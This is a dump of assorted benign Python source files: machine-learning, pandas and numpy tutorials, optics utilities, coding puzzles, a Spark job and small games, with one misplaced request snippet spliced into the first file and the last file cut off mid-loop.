Emitter(bricks.Initializable):\n def __init__(self, input_dim, n_classes, batch_normalize, **kwargs):\n super(Emitter, self).__init__(**kwargs)\n\n self.input_dim = input_dim\n self.n_classes = n_classes\n\n # TODO: use TensorLinear or some such\n self.emitters = [\n masonry.construct_mlp(\n activations=[None, bricks.Identity()],\n input_dim=input_dim,\n hidden_dims=[input_dim/2, n],\n name=\"mlp_%i\" % i,\n batch_normalize=batch_normalize,\n weights_init=initialization.Orthogonal(),\n biases_init=initialization.Constant(0))\n for i, n in enumerate(self.n_classes)]\n self.softmax = bricks.Softmax()\n\n self.children = self.emitters + [self.softmax]\n\n @application(inputs=['x', 'y'], outputs=['cost'])\n def cost(self, x, y, n_patches):\n max_length = len(self.n_classes) - 1\n _length_masks = theano.shared(\n np.tril(np.ones((max_length, max_length), dtype='int8')),\n name='shared_length_masks')\n lengths = y[:, -1]\n length_masks = _length_masks[lengths]\n\n def compute_yhat(logprobs):\n digits_logprobs = T.stack(*logprobs[:-1]) # (#positions, batch, #classes)\n length_logprobs = logprobs[-1] # (batch, #classes)\n # predict digits independently\n digits_hat = digits_logprobs.argmax(axis=2) # (#positions, batch)\n # likelihood of prediction\n digits_logprob = digits_logprobs.max(axis=2)\n # logprobs of resulting number given length\n number_logprobs = T.extra_ops.cumsum(digits_logprob, axis=0) # (#positions, batch)\n # choose length to minimize length_logprob + number_logprob\n length_hat = (length_logprobs.T + number_logprobs).argmax(axis=0, keepdims=True) # (1, batch)\n yhat = T.concatenate([digits_hat, length_hat], axis=0).T\n return yhat # shape (batch, #positions + 1)\n\n def compute_mean_cross_entropy(y, logprobs):\n return sum(self.softmax.categorical_cross_entropy(y[:, i], logprob)\n # to avoid punishing predictions of nonexistent digits:\n * (length_masks[:, i] if i < max_length else 1)\n for i, logprob in enumerate(logprobs)).mean()\n def compute_error_rate(y, logprobs):\n yhat = compute_yhat(logprobs)\n return T.stack(*[T.neq(y[:, i], yhat[:, i])\n # to avoid punishing predictions of nonexistent digits:\n * (length_masks[:, i] if i < max_length else 1)\n for i, logprob in enumerate(logprobs)]).any(axis=0).mean()\n\n logprobs = [self.softmax.log_probabilities(emitter.apply(x))\n for 
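# For context on the 'data_relation' in the schema above: in Eve, a field marked
# 'embeddable': True can be expanded client-side with the ?embedded query
# parameter, so the referenced 'users' document is inlined in place of the bare
# ObjectId. A sketch of such a request (host, port, and client choice are
# hypothetical, not part of the mapping above):
import requests

resp = requests.get(
    "http://localhost:5000/online",
    params={"embedded": '{"users": 1}'},
)
print(resp.json())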
emitter in self.emitters]\n        mean_cross_entropy = compute_mean_cross_entropy(y, logprobs)\n        mean_error_rate = compute_error_rate(y, logprobs)\n\n        self.add_auxiliary_variable(mean_cross_entropy, name=\"cross_entropy\")\n        self.add_auxiliary_variable(mean_error_rate, name=\"error_rate\")\n\n        cost = mean_cross_entropy\n        return cost\n\nclass NumberTask(tasks.Classification):\n    name = \"svhn_number\"\n\n    def __init__(self, *args, **kwargs):\n        super(NumberTask, self).__init__(*args, **kwargs)\n        self.max_length = 5\n        self.n_classes = [10,] * self.max_length + [self.max_length]\n        self.n_channels = 1\n\n    def load_datasets(self):\n        return dict(\n            train=SVHN(which_sets=[\"train\"]),\n            valid=SVHN(which_sets=[\"valid\"]),\n            test=SVHN(which_sets=[\"test\"]))\n\n    def get_stream_num_examples(self, which_set, monitor):\n        if monitor and which_set == \"train\":\n            return 10000\n        return super(NumberTask, self).get_stream_num_examples(which_set, monitor)\n\n    def get_emitter(self, input_dim, batch_normalize, **kwargs):\n        return Emitter(input_dim, self.n_classes,\n                       batch_normalize=batch_normalize)\n\n    def monitor_channels(self, graph):\n        return [VariableFilter(name=name)(graph.auxiliary_variables)[0]\n                for name in \"cross_entropy error_rate\".split()]\n\n    def plot_channels(self):\n        return [[\"%s_%s\" % (which_set, name) for which_set in self.datasets.keys()]\n                for name in \"cross_entropy error_rate\".split()]\n\n    def preprocess(self, data):\n        x, y = data\n\n        x = np.float32(x) / 255.0\n        x = x.mean(axis=3, keepdims=True) # grayscale\n        # move channel axis forward\n        x = np.rollaxis(x, 3, 1)\n\n        # crop images randomly\n        assert(x.shape[2] == x.shape[3])\n        image_size = x.shape[2]\n        crop_size = 54\n        a = np.random.randint(0, image_size - crop_size, size=(2,))\n        b = a + crop_size\n        x = x[:, :, a[0]:b[0], a[1]:b[1]]\n\n        y = np.array(y, copy=True)\n        # use zero to represent zero\n        y[y == 10] = 0\n        lengths = (y >= 0).sum(axis=1)\n        y[y < 0] = 0\n        # pretend there are no examples with length > 5 (there are too few to care about)\n        lengths = np.clip(lengths, 0, 5)\n        # repurpose the last column to store 0-based lengths\n        y[:, -1] = lengths - 1\n\n        x_shape = np.tile([x.shape[2:]], (x.shape[0], 1))\n        return (x.astype(np.float32),\n                x_shape.astype(np.float32),\n                y.astype(np.uint8))\n","repo_name":"negar-rostamzadeh/LSTM-Attention","sub_path":"goodfellow_svhn.py","file_name":"goodfellow_svhn.py","file_ext":"py","file_size_in_byte":6095,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"50"} +{"seq_id":"72049660956","text":"import random\n\ndef random_vector (index, dimensions, type) :\n    random.seed(index * 3 * 7 * 11 * 3 + 3 * 7 * 2 * 2)\n    result = []\n    for dimension in range(dimensions) :\n        if type in set(['i', 's', 'ui', 'us', 'b', 'ub']):\n            result.append(random.randint(-20, 20))\n        else:\n            result.append(random.randint(-20, 20) + random_mantiss(random, random.randint(2, 4)))\n\n    return result\n\ndef random_mantiss (random, size) :\n    result = 0\n\n    for index in range(size) :\n        result += random.randint(0, 1) / (2 ** index)\n\n    return result\n","repo_name":"cedric-demongivert/gl-tool-math","sub_path":"generation/src/random_vector.py","file_name":"random_vector.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"22147007904","text":"import numpy as np\n\narr = np.array([1, 3, 5, 7])\n\nx = np.searchsorted(arr, [2, 4, 6])\n\nprint(x)\n\n\n\n\n# Multiple Values\n# To search for more than one value, use 
an array with the specified values.\n\n# Example\n# Find the indexes where the values 2, 4, and 6 should be inserted:\n\n\n\n# The return value is an array: [1 2 3] containing the three indexes where 2, 4, 6 would be inserted in the original array to maintain the order.\n","repo_name":"StumbledUponCS/10_Python_Examples","sub_path":"Python Examples/02) NumPy Intro/index172.py","file_name":"index172.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"25776912813","text":"import random\ngame_action = ['Rock', 'Paper', 'Scissors']# These are the valid actions for this game.\n# a score-board to keep the score of both players.\nPlayer1_score = 0\nPlayer2_score = 0\nbreak_out = True\nwhile break_out:\n    try:\n        #Asks the player for the number of rounds.\n        #input must be of only integer types greater than zero.\n        rounds = int(input('How many rounds will you like to play? '))\n        assert rounds > 0, print('invalid value for rounds')\n        #Handles a possible error that might occur in case an invalid number is entered by the player.\n    except:\n        print('invalid value for rounds')\n        continue\n    else:\n        #repeats the game for x number of times the user has entered in rounds\n        for i in range(rounds):\n            #requests for the player's choice of game_action \n            Player1_choice = input('What would you like to play Rock, Paper or Scissors? ')\n            if Player1_choice not in game_action:\n                print('invalid action')\n                continue\n            else:\n                Player2_choice = random.choice(game_action)\n                print(Player1_choice)\n                print(Player2_choice)\n                if Player1_choice == Player2_choice:\n                    result = 'This is a tie'\n                    print(result)\n                    print(Player1_score)\n                    print(Player2_score)\n                elif (Player1_choice == 'Paper' and Player2_choice == 'Rock') or (Player1_choice == 'Scissors' and Player2_choice == 'Paper') or (Player1_choice == 'Rock' and Player2_choice == 'Scissors') :\n                    result = 'Player1 is the winner of this round'\n                    Player1_score += 1\n                    print(result)\n                    print(Player1_score)\n                    print(Player2_score)\n                else:\n                    result = 'Player2 is the winner of this round'\n                    Player2_score += 1\n                    print(result)\n                    print(Player1_score)\n                    print(Player2_score)\n        if Player1_score > Player2_score:\n            print('\\nPlayer1 wins the game')\n        elif Player2_score > Player1_score:\n            print('\\nPlayer2 wins the game')\n        else:\n            print('\\nThe game ends in a tie')\n        if rounds == 0:\n            break\n        break_out = False\n        \n        \n","repo_name":"classManc/Python-beginners-project","sub_path":"Rock_Paper_Scissors.py","file_name":"Rock_Paper_Scissors.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"14302723112","text":"# %% [markdown]\n# Tutorial - Data manipulation with pandas\n\n# %%\n# Set up\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\npd.set_option('display.max_rows', 10) # Set max number of rows displayed\nfrom scipy.spatial.distance import pdist, squareform\nfrom scipy.cluster.hierarchy import linkage, dendrogram\nfrom pathlib import Path\n\n# %% Data Setup\n# Import iris dataset\nsns.set_style(\"white\")\niris = sns.load_dataset(\"iris\")\n\nsepal_length = iris['sepal_length']\nsepal_width = iris['sepal_width']\npetal_length = iris['petal_length']\npetal_width = iris['petal_width']\nspecies = iris['species']\n\n# %% Importing exporting data\n# Setting up path using pathlib\n## pathlib is a library specifically for manipulating strings of 
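# A small follow-up to the searchsorted example above: the optional side
# argument controls which insertion point is returned when the searched value
# is already present in the array.
import numpy as np

arr = np.array([1, 3, 5, 7])
print(np.searchsorted(arr, 5))                # 2: leftmost valid slot
print(np.searchsorted(arr, 5, side='right'))  # 3: just past the existing 5
print(np.searchsorted(arr, [2, 4, 6]))        # [1 2 3], as described above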
directories etc. Strings work most of the time, but pathlib offers greater flexibility and functionality.\ncsv_filename = Path('./iris.csv')\nexcel_filename = Path('./iris.xlsx')\n\n# Writing .csv files\n## .csv files are basic filetypes for storing data. They are the simplest to interpret and can be read by many programs. However, csv files can be slow to read and write huge datasets. For most use cases though, csv files are more than sufficient.\n## Note that to write a file, use the .to_csv() method\n## to read a file, use the pd.read_csv() function\niris.to_csv(csv_filename)\niris_csv = pd.read_csv(csv_filename)\niris_csv2 = pd.read_csv(csv_filename,index_col=0) # Ignores the index column\n\n# Writing .xlsx files\niris.to_excel(excel_filename)\niris_excel = pd.read_excel(excel_filename)\niris_excel2 = pd.read_excel(excel_filename, index_col=0) # Ignores the index column\n\n# %% Creating dataframe\n## Dataframe is to pandas what np.array is to numpy.\n## Dataframe has several methods useful for data exploration.\n\n# Create Series\nstem_length = abs(np.round(3 + 0.5 * np.random.normal(size = iris.shape[0]),1))\nstem_length_series = pd.Series(stem_length, name='stem_length')\n\n# From numpy array\niris\niris_df1 = pd.DataFrame(np.array([sepal_length, sepal_width, petal_length, petal_width, species]).T, columns=['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'species'])\n\n# From a dictionary\niris_dict = {'sepal_length': sepal_length,\n'sepal_width': sepal_width,\n'petal_length': petal_length,\n'petal_width': petal_width,\n'species': species} # Create dictionary\niris_df2 = pd.DataFrame(iris_dict)\n\n# %% Access data\n# Get column\niris\niris['species']\n\n# Get column names\niris.columns\n\n# Get row\niris.iloc[3] # Based on row location\niris.loc[3] # Based on name of index\ntype(iris.iloc[3])\n\n# Get row names\niris.index\nlist(iris.index)\n\n# Get values of a particular row and column\niris.iloc[3,0]\niris.loc[3,'sepal_length']\n\n# Get values based on conditionals\n## Check the output data type\niris['sepal_length'] < 6\nboolean_array = iris['sepal_length'] < 6\niris[boolean_array]\niris[boolean_array]['sepal_length']\n\n# Iterate rows\nfor ind, row in iris.iterrows():\n print(row[4])\n\n# %% Add data\n# Add columns\n## Note that the input is in the form of a list\niris_newcol = pd.concat([stem_length_series, iris], axis=1)\n\n# Add rows\n## Note the difference between .concat and .append\nnew_sample = pd.Series([5.2,3.5,1.6,0.3,'setosa'], index=['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'species'])\niris_newrow = pd.concat([iris, new_sample], axis=0) # Does not work\niris_newrow = iris.append(new_sample,ignore_index=True)\n\n## You can combine multiple dataframes as well\n\n# %% Manipulate data\n##\n# Creating a copy\n## A copy lets you manipulate the data without affecting the original dataset.\niris_copy1 = iris.copy()\niris_copy2 = iris.copy()\n\n# Change value\niris_copy1['species'][149]='custom1'\niris_copy1\n\niris_copy2.loc[149,'species']='custom2'\niris_copy2\n\n# Change NaN data\nnandf = pd.Series([np.nan for i in range(iris.shape[0])], name='nan_col')\niris_w_nan = pd.concat([iris,nandf], axis=1)\niris_w_nan['nan_col'].isna() #Get boolean of nan\n\niris_w_nan['nan_col'] = iris_w_nan['nan_col'].fillna(0.1)\n\n# Round data\niris.round({'sepal_length': 1, 'petal_length': 0})\n\n# Rename columns or rows\niris.rename(columns = {'sepal_length': 'SL', 'petal_length': 'PL'})\niris.rename(index={1:'One'})\n\n# Wide to long form\niris_long = 
pd.melt(iris, id_vars=['species'], value_vars=['sepal_length','sepal_width','petal_length','petal_width'], var_name='plant_properties', value_name='perperty_values')\niris_long\n\n# Sort by column\niris.sort_values('sepal_length')\niris.sort_values(['sepal_length','petal_length'])\n\n# %% Explore data\n# Statistics\niris.mean() # Calculate mean of all relevant columns\niris.std() # Calculate standard deviation of all relevant columns\niris['sepal_length'].var() # Calculate variance of a single column\ngmean = lambda x: np.exp(np.mean(np.log(x))) # Geometric mean\ngmean(iris['sepal_length']) # Calculate gmean of a particular column\niris_without_species = iris.iloc[:,0:-1]\niris_without_species.apply(gmean, axis=0) # Calculate gmean of columns\niris_without_species.apply(gmean, axis=1) # Calculate gmean of rows\n\n\n# Fast exploration\n## Pandas is commonly used for data exploration. .info() and .describe() are two commonly used methods to explore the data quickly.\niris.info()\niris.describe()\n\n# Groupby\n## Groupby creates groups based on categorical values of a particular column.\niris_gb = iris.groupby('species')\niris_gb.groups\niris_gb.get_group('setosa')\niris_gb['sepal_length'].mean()\niris_gb.describe()\n","repo_name":"macadology/coding-bootcamp","sub_path":"Tutorial_pandas.py","file_name":"Tutorial_pandas.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13971011142","text":"pl.clf()\nnpts=1024\na=7.\nb=3.\nz=1.*np.arange(npts)/npts\nline=a+b*z\n\nc=.7\nd=.3\n\n\n\nsignal= line+np.random.random(size=npts) +c*np.cos(17.3*z) +d*np.sin(62.*z)\n \nzsignal=signal-signal.mean() # zsignal has 0 mean.\nsft=np.fft.fft(zsignal-b*(z-.5)) # sft is the signal fft\ndf=0.03\nf1=np.exp(-z**2/(2.*df**2))\nf2=np.exp(-(1.-z)**2/(2.*df**2))\nfilter=f1+f2\n\nlpsft= sft*filter # lpsft is a low-pass sft\n\nlpinv=np.fft.ifft(lpsft) # lpinv is the inv ft of lpsft\n\npl.plot(z,signal)\npl.plot(z,lpinv+signal.mean()+b*(z-.5)) # notice factor of 2!!\n\npl.plot(z,lpinv+signal.mean()+b*(z-.5),'r')\n\npl.plot(z,signal-(lpinv+signal.mean()+b*(z-.5)),'g')\n\npl.plot(z,2.*lpinv,'r') \n","repo_name":"sidhant-guliani/Thermal_test_CHIME","sub_path":"30oct-Round trip phase measurement/filter(Mark emailed).py","file_name":"filter(Mark emailed).py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"45236623018","text":"\"\"\"\nMiscellaneous functions used to analyze \nand modify optical results. \n\nGrace E. 
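# One groupby idiom that complements the pandas tutorial above: .transform()
# returns a result aligned to the original rows, unlike .mean() or .describe(),
# which makes per-group normalisation a one-liner (the derived column name
# below is arbitrary):
import seaborn as sns

iris = sns.load_dataset("iris")
species_mean = iris.groupby("species")["sepal_length"].transform("mean")
iris["sepal_length_centered"] = iris["sepal_length"] - species_mean
print(iris[["species", "sepal_length", "sepal_length_centered"]].head())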
Chesmore\nMay 2021\n\"\"\"\n\nimport numpy as np\n\n\n# Phase unwrapping\ndef twodunwrapx(array):\n phase_offset = np.arange(-1000, 1000) * 2 * np.pi\n\n end_i = np.shape(array)[0] - 1\n end_j = np.shape(array)[1] - 1\n\n i = int(end_i / 2)\n while i < end_i:\n j = int(end_j / 2)\n while j < (np.shape(array))[1] - 1:\n current_val = [array[i, j]]\n next_val = array[i, j + 1] + phase_offset\n diff = np.abs(next_val - current_val)\n best = np.where(diff == np.min(diff))\n array[i, j + 1] = next_val[best][0]\n\n j += 1\n i += 1\n\n i = int(end_i / 2)\n while i > 0:\n j = int(end_j / 2)\n while j > 0:\n current_val = [array[i, j]]\n next_val = array[i, j - 1] + phase_offset\n diff = np.abs(next_val - current_val)\n best = np.where(diff == np.min(diff))\n array[i, j - 1] = next_val[best][0]\n\n j -= 1\n i -= 1\n\n i = int(end_i / 2)\n while i < end_i - 1:\n j = int(end_j / 2)\n while j > 0:\n current_val = [array[i, j]]\n next_val = array[i, j - 1] + phase_offset\n diff = np.abs(next_val - current_val)\n best = np.where(diff == np.min(diff))\n array[i, j - 1] = next_val[best][0]\n\n j -= 1\n i += 1\n\n i = int(end_i / 2)\n while i > 0:\n j = int(end_j / 2)\n while j < end_j - 1:\n current_val = [array[i, j]]\n next_val = array[i, j + 1] + phase_offset\n diff = np.abs(next_val - current_val)\n best = np.where(diff == np.min(diff))\n array[i, j + 1] = next_val[best][0]\n\n j += 1\n i -= 1\n\n return array\n\n\n# Unwraps the phase two times. The first time the phase is\n# transposed and unwrapped, then it is transposed again\n# (returned to normal state) and unwrapped.\ndef twodunwrap(array):\n xunwraped = twodunwrapx(np.transpose(array))\n unwrapped = twodunwrapx(np.transpose(xunwraped))\n return unwrapped\n\n\n# Unwraps the phase (calling on other unwrap functions) and\n# normalizes to the center of the phase measurement.\ndef do_unwrap(phi):\n unwraped_phi = twodunwrap(phi)\n # print(unwraped_phi[int(len(unwraped_phi)/2),int(len(unwraped_phi)/2)])\n # unwraped_phi = unwraped_phi - unwraped_phi[0,0]\n unwraped_phi = (\n unwraped_phi\n - unwraped_phi[int(len(unwraped_phi) / 2), int(len(unwraped_phi) / 2)]\n )\n return unwraped_phi\n\n\n# Rotate coordinates in azimuth and elevation.\ndef rotate_azel(xyz, az, el):\n\n out = np.zeros(np.shape(xyz))\n\n x = xyz[0]\n y = xyz[1]\n z = xyz[2]\n\n # Rotate in elevation (note we assume z is along the elevation direction)\n xt = np.cos(el) * x + np.sin(el) * z\n yt = y\n zt = (-1.0) * np.sin(el) * x + np.cos(el) * z\n\n # Rotate in azimuth\n out[0] = xt\n out[1] = np.cos(az) * yt + np.sin(az) * zt\n out[2] = (-1.0) * np.sin(az) * yt + np.cos(az) * zt\n\n return out\n\n\n# Given two arrays, calculate the 2D power spectrum\n# for a given ell range, pixel size, and pixel number.\ndef calculate_2d_spectrum(Map1, Map2, delta_ell, ell_max, pix_size, N):\n \"calcualtes the power spectrum of a 2d map by FFTing, squaring, and azimuthally averaging\"\n N = int(N)\n\n # Make a 2d ell coordinate system\n ones = np.ones(N)\n inds = (np.arange(N) + 0.5 - N / 2.0) / (N - 1.0)\n kY = np.outer(ones, inds) / (pix_size / 60.0 * np.pi / 180.0)\n kX = np.transpose(kY)\n K = np.sqrt(kX ** 2.0 + kY ** 2.0)\n ell_scale_factor = 2.0 * np.pi\n ell2d = K * ell_scale_factor\n\n # Make an array to hold the power spectrum results\n N_bins = int(ell_max / delta_ell)\n ell_array = np.arange(N_bins)\n CL_array = np.zeros(N_bins)\n input_maps = (np.conj(Map1) * Map1) / np.sum(abs(np.conj(Map1) * Map1))\n\n # 2d fourier transform of the map\n FMap1 = 
np.fft.fft2(np.fft.fftshift(input_maps))\n    FMap2 = np.fft.fft2(np.fft.fftshift(input_maps))\n    PSMap = np.fft.fftshift(np.real(np.conj(FMap1) * FMap2))\n\n    # Fill out the spectra\n    i = 0\n    while i < N_bins:\n        ell_array[i] = (i + 0.5) * delta_ell\n        inds_in_bin = (\n            (ell2d >= (i * delta_ell)) * (ell2d < ((i + 1) * delta_ell))\n        ).nonzero()\n        CL_array[i] = np.mean(PSMap[inds_in_bin])\n        i = i + 1\n    # Return the power spectrum and ell bins\n\n    return (ell_array, CL_array)\n\n\n# Elevation offset of holography measurements\ndef el_offset(x):\n    slope = (-0.0204345 - 0.00719988) / (400)\n    return x * slope\n\n\n# Azimuth offset of holography measurements\ndef az_offset(x):\n    slope = (0.01367175) / (200)\n    return x * slope\n\n\n# Shifts for holography measurements\ndef sh_z(z):\n    return z * ((0.33 + 0.33) / 1200)\n\n\ndef sh_x(z):\n    return z * ((0.36 + 0.36) / 1200)\n\n\n# Ruze equation quantifying gain loss due\n# to surface defects on antenna.\ndef ruze(eps, lam):\n    return np.exp(-2 * (4 * np.pi * eps / lam) ** 2)\n\n\n# Computes the RMS of z for a given area(x,y)\ndef rms(x, y, z):\n    aperture_r = 2.75  # apodized beam radius [m]\n    rr = np.where(\n        ((x - np.mean(x)) ** 2 + (y - np.mean(y)) ** 2) <= aperture_r ** 2\n    )  # throw out outliers\n    z_rms = z[rr]\n    return np.sqrt(np.sum(z_rms ** 2) / len(z_rms))\n","repo_name":"McMahonCosmologyGroup/holosim-ml","sub_path":"optics_analyze.py","file_name":"optics_analyze.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"4197294266","text":"import heapq\nfrom typing import List\nclass Solution:\n    def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n        if len(nums) == 0: return []\n        dictonary = dict()\n        for i in range(0, len(nums)):\n            if nums[i] in dictonary:\n                dictonary[nums[i]] += 1\n            else:\n                dictonary[nums[i]] = 1\n        heap = [(key, value) for key, value in dictonary.items()]\n        heapq.heapify(heap)\n        maximum = heapq.nlargest(k, heap, key=lambda x: x[1])\n        return [i[0] for i in maximum]\n","repo_name":"PrakharKopergaonkar/LeetCode-July-Challenge","sub_path":"Week3/K_frequent.py","file_name":"K_frequent.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"25305019593","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col\n\n# Create a SparkSession\nspark = SparkSession.builder.appName(\"WineQualityAnalysis\").getOrCreate()\n\n# Read the wine data from CSV\nwine = spark.read.format(\"csv\") \\\n    .option(\"header\", True) \\\n    .option(\"inferSchema\", True) \\\n    .option(\"path\", \"hdfs:///lab_test/wine.csv\") \\\n    .load()\n\n# Group the data by quality and count the occurrences\nquality_counts = wine.groupBy(\"quality\").count().orderBy(\"quality\")\n\n# Show the frequency of each quality rating\nquality_counts.show()\n\n# Stop the SparkSession\nspark.stop()\n","repo_name":"wanjia0523/tt","sub_path":"test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"28036364863","text":"import re\nimport sys\nfrom dataclasses import dataclass\nimport math\n\nsys.path.append(\"c:\\\\Users\\\\james_pc\\\\projects\\\\aoc2020\\\\\")\nsys.path.append(\"./..\")\n\nfrom utils import time_algo\n\nPATH = \"day13/\"\n\n# Part 1\n\n# Class here will be ship\n#\n\n\ndef get_input(filename):\n    my_file = open(filename, \"r\")\n    
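# An illustrative driver for calculate_2d_spectrum() defined in optics_analyze
# above; the map size, pixel scale, and binning are made-up values, and a
# white-noise map stands in for real beam data:
import numpy as np
from optics_analyze import calculate_2d_spectrum  # the module shown above

N = 64          # pixels per side (assumed)
pix_size = 0.5  # arcminutes per pixel (assumed)
rng = np.random.default_rng(0)
test_map = rng.standard_normal((N, N))

ell, cl = calculate_2d_spectrum(
    Map1=test_map, Map2=test_map,
    delta_ell=500, ell_max=10000,
    pix_size=pix_size, N=N,
)
print(ell[:5], cl[:5])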
content = my_file.readlines()\n return [line.rstrip() for line in content]\n\n\ndef parse_input(input):\n time_now = input.pop(0)\n busses = []\n\n busses_input = input\n busses_input = busses_input[0].split(\",\")\n\n for bus in busses_input:\n if bus == \"x\":\n busses.append(None)\n continue\n busses.append(Bus(bus_no=bus, period=bus, first_leave=0))\n\n return time_now, busses\n\n\ndef parse_input_v2(input):\n time_now = input.pop(0)\n busses = []\n offsets = []\n\n busses_input = input\n busses_input = busses_input[0].split(\",\")\n\n for offset in range(len(busses_input)):\n bus = busses_input[offset]\n if bus == \"x\":\n continue\n\n busses.append(Bus(bus_no=bus, period=bus, first_leave=0))\n offsets.append(offset)\n\n return busses, offsets\n\n\nclass Bus:\n def __init__(self, bus_no, period, first_leave):\n self.bus_no = int(bus_no)\n self.period = int(period)\n self.first_leave = int(first_leave)\n\n def time_to_next_bus(self, time_now):\n time_now = int(time_now)\n last_left = (time_now // self.period) * self.period\n next_leave = last_left + self.period\n\n return next_leave - time_now\n\n def __repr__(self):\n return str(self.bus_no)\n\n def leaves_now(self, time_now):\n time_now = int(time_now)\n if (time_now % self.period) == 0:\n return True\n else:\n return False\n\n\ndef part1_solve(time_now, busses):\n first_bus = None\n first_leave_time = None\n\n for bus in busses:\n leave_time = bus.time_to_next_bus(time_now)\n\n if (first_bus == None) or (first_leave_time > leave_time):\n first_bus = bus\n first_leave_time = leave_time\n\n return first_leave_time * first_bus.bus_no\n\n\ndef part2_solve(bus_order):\n # could brute force, try out numbers, see if the requirement is met\n # could do bit better, rather than loop through all number, could loop\n # through multiples of the first one\n first_bus = bus_order[0]\n first_bus_leave = 0\n\n while True:\n failure = False\n for x in range(len(bus_order)):\n if bus_order[x] is None:\n pass\n else:\n bus = bus_order[x]\n if not bus.leaves_now(first_bus_leave + x):\n # this fails\n failure = True\n break\n\n if failure:\n first_bus_leave += first_bus.period\n else:\n break\n\n return first_bus_leave\n\n\ndef part2_solve_v2(busses, offsets):\n # could we ingore the x by smarter parsing here?\n # have a list of busses, and there offset\n # also, can we increment by the largest bus number?, as I suspect that will cut down\n # time, especially if the largest bus is big\n\n # looks like this is twice as fast as part v1 only :/\n\n # get longest period\n longest_period = 0\n diff_first_bus = 0\n for x in range(len(busses)):\n bus = busses[x]\n offest = offsets[x]\n\n if bus.period > longest_period:\n longest_period = bus.period\n diff_first_bus = offest\n\n first_bus_leave = 0\n num_longest_period = 0\n\n while True:\n failure = False\n for x in range(len(busses)):\n bus = busses[x]\n offset = offsets[x]\n\n if not bus.leaves_now(first_bus_leave + offset):\n # this fails\n failure = True\n break\n\n if failure:\n num_longest_period += 1\n first_bus_leave = (num_longest_period * longest_period) - diff_first_bus\n else:\n break\n\n return first_bus_leave\n\n\ndef part2_solve_v3(busses, offsets):\n # Say we have the equations\n # T = 3x\n # Here, T=3 is a solution (here x =1)\n # We can also write this as T (mod 3) = 0\n #\n # Now if also\n # T = 1 + 4y\n # or T (mod 4) = 1\n # The previous answer T= 3 isn't solution, but if find a solution T = a * 3 where a is int\n # where this equation is satisfied, the first equation will still be 
satisfied\n # Timesing T by an arbitrary number 3 has no affect on T (mod 3) =0, as a*0 = 0\n #\n # Now if also:\n # T = 2 + 5z\n # T (mod 5) = 2\n # The we can iterate through T = a * 3 * 4 till we find a solution.\n # Importantly, all the other equations will still be satisfied.\n # T (mod 4) = 1 is still value, as timsing by 12 (3*4) will NOT affect modulo\n # as 12 is a multiple of 4\n #\n #\n # So loop through the busses finding a first_bus_leave time that works.\n # Use the product from the previous buses as the \"period here\".\n # So that the next solutuion we guess is current_period * a where we iterate a\n #\n # After more research, this is https://en.wikipedia.org/wiki/Chinese_remainder_theorem#Search_by_sieving\n first_bus_leave = None\n current_period = None\n\n for x in range(len(busses)):\n bus = busses[x]\n offset = offsets[x]\n\n if first_bus_leave == None:\n first_bus_leave = bus.period + offset\n current_period = bus.period\n else:\n\n while (first_bus_leave + offset) % (bus.period) != 0:\n first_bus_leave += current_period\n current_period *= bus.period\n\n return first_bus_leave\n\n\nif __name__ == \"__main__\":\n\n time_now, busses = parse_input(get_input(PATH + \"test_input\"))\n print(part2_solve(busses))\n\n busses, offsets = parse_input_v2(get_input(PATH + \"real_input\"))\n print(part2_solve_v3(busses, offsets))\n\n \"\"\"\n time_now, busses = parse_input(get_input(PATH + \"test_input_1\"))\n time_algo(part2_solve, busses)\n\n busses, offsets = parse_input_v2(get_input(PATH + \"test_input_1\"))\n time_algo(part2_solve_v2, busses, offsets)\n\n # Trying real\n busses, offsets = parse_input_v2(get_input(PATH + \"real_input\"))\n print(part2_solve_v2(busses, offsets))\n \"\"\"\n","repo_name":"semajson/aoc2020","sub_path":"day13/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":6247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"6922557472","text":"# Joshua Adrian O. Daet\n# BSCpE 1-4\n# Assignment 4 - Problem 3\n\nimport random\n\ndef write():\n # open mylife.txt and put the write function to it\n try:\n with open(\"C:/assignments_oop/A4-Problem3/mylife.txt\", \"w\") as my_life:\n while True:\n # put a variable to where the user will input their lines\n line = input(\"Enter a line (press Enter to exit): \")\n\n # exit the loop if the user presses Enter\n if not line:\n break\n\n # to write a new line on the file\n my_life.write(line + \"\\n\")\n\n # ask the user if they want to enter another line\n choices = input(\"Do you want to enter another line? (y/n): \")\n\n # make a comment\n if choices == \"n\":\n print(\"\")\n comments = [\"You're doing great\", \"Great job!\", \"That was great!\", \"Impressive!\"]\n print(random.choice(comments))\n print(\"\")\n print(\"Thank you for using\")\n break\n elif choices != \"y\":\n print(\"Invalid input. Please enter 'y' or 'n'.\")\n\n # do a while loop to ask the user repeatedly\n while choices == \"y\":\n print(\"\")\n line = input(\"Enter a line: \")\n\n # to write a new line on the file\n my_life.write(line + \"\\n\")\n\n # ask again the user if they want to continue\n choices = input(\"Do you want to enter another line? (y/n): \")\n\n # comments\n 